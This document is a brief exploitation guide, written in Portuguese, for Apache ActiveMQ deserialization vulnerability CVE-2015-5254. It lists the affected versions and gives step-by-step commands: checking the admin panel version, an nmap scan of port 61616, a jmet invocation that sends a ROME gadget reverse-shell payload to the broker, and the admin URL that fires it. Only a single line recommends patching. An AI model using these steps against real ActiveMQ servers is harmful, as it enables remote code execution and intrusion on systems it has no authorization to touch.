
ActiveMQ_CVE-2015-5254
ActiveMQ反序列化 (CVE-2015-5254)
Descrição da vulnerabilidade: Nas versões 5.x do Apache ActiveMQ anteriores a 5.13.0, existe uma vulnerabilidade de segurança porque o programa não restringe as classes que podem ser serializadas no broker. Um atacante remoto pode explorar esta vulnerabilidade usando um objeto ObjectMessage do Java Message Service (JMS) serializado especialmente criado para executar código arbitrário.
Versões afetadas: Versões 5.x do Apache ActiveMQ anteriores a 5.13.0
0x01 Acessar o painel de administração e verificar a versão: http://IP:8161

0x02 Verificar se a porta 61616 está aberta:
nmap -sV -Pn -T4 -sC -p 61616 IP

0x03 Enviar payload de reverse shell:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616

0x04 Clicar para acionar Browse event-Message ID, reverse shell bem-sucedido:
http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event

Recomendação de correção: Atualizar para a versão mais recente e configurar regras WAF apropriadas para bloquear.